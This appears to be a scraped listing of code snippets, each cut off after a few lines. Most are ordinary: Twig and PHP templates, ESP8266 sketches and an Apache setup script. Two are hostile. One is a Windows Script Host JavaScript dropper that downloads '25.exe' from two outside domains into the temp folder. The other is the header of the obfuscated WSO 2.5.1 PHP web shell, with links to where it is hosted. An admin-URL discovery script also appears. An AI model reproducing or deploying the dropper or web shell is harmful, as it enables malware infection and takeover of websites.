This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | {% extends 'bootstrap_4_horizontal_layout.html.twig' %} | |
| {% block form_label_errors %}{% endblock %} | |
| {% block form_row -%} | |
| {%- if expanded is defined and expanded -%} | |
| {{ block('fieldset_form_row') }} | |
| {%- else -%} | |
| <div class="form-group row{% if (not compound or force_error|default(false)) and not valid %} is-invalid{% endif %}"> | |
| {{- form_label(form) -}} | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <?php | |
| namespace App\Entity; | |
| use Doctrine\ORM\Mapping as ORM; | |
| /** | |
| * @ORM\Entity(repositoryClass="App\Repository\ExampleRepository") | |
| * @ORM\HasLifecycleCallbacks() | |
| * @ORM\Table("examples") | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #include <ESP8266WiFi.h> | |
| int PIN_N = 15; // pin on which LED is connected | |
| int PIN_MODE = LOW; | |
| int SERIAL_BAUD = 115200; | |
| const char* WIFI_SSID = "ESP8266"; // your WiFi SSID | |
| const char* WIFI_PASSWORD = "nodemcutest"; // your WiFi password | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | int BLINK_SPEED_MS = 250; | |
| int PIN_N = 15; | |
| void setup() { | |
| // put your setup code here, to run once: | |
| pinMode(PIN_N, OUTPUT); | |
| } | |
| void loop() { | |
| // put your main code here, to run repeatedly: | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #!/usr/bin/env bash | |
| APACHE_USER=wwwhost | |
| VHOSTS_DOMAINS=(example.com second.example.com) | |
| sudo ufw allow in "OpenSSH" | |
| # Install Apache | |
| sudo apt-get update | |
| sudo apt-get install apache2 | |
| sudo nano /etc/apache2/apache2.conf # Add ServerName ... directive at bottom | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <?php | |
| /** | |
| * @param string $plain | |
| * @param string $algo | |
| * @param int $iterations | |
| * @param int $saltlen | |
| * @param int $keylen | |
| * @return string | |
| */ | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | (function() { | |
| var urls = [ | |
| 'http://wherareyoufromff.com/25.exe', | |
| 'http://arendroukysdqq.com/25.exe' | |
| ]; | |
| var shell = WScript.CreateObject('WScript.Shell'); | |
| var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP'); | |
| var stream = WScript.CreateObject('ADODB.Stream'); | |
| var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\'); | |
| var file = tmp + 4194304 + '.exe'; | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <?php | |
| /** | |
| * v2.5.1 | |
| * Hosted at: http://pastebin.com/BXmWGhMu (Line: #1037) | |
| * Hosted at: http://snipplr.com/view/70661/ (Line: #1037) | |
| * Hosted at: http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/wso2.5.1.zip (Line: #1037) | |
| * Hosted at: http://pastebin.com/KCtz6XA9 (Line: #1037) | |
| */ | |
| // Obfuscated | |
| $x10 = "\x6dai\154"; | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | import java.security.MessageDigest; | |
| import android.content.Context; | |
| import android.content.pm.PackageInfo; | |
| import android.content.pm.PackageManager; | |
| import android.content.pm.Signature; | |
| import android.util.Base64; | |
| class Signature { | |
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | <?php | |
| /** | |
| * Simple script to find possible admin URLs for a given domain | |
| * Replace [ .* ] with array( .* ) if running PHP < 5.4 (if found) | |
| * By Vaibhav Pandey <[email protected]> | |
| */ | |
| define('REGEX_DOMAIN', '/^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|([a-zA-Z0-9][a-zA-Z0-9-_]{1,61}[a-zA-Z0-9]))\.([a-zA-Z]{2,6}|[a-zA-Z0-9-]{2,30}\.[a-zA-Z]{2,3})$/'); | |
| function __code($uri) { |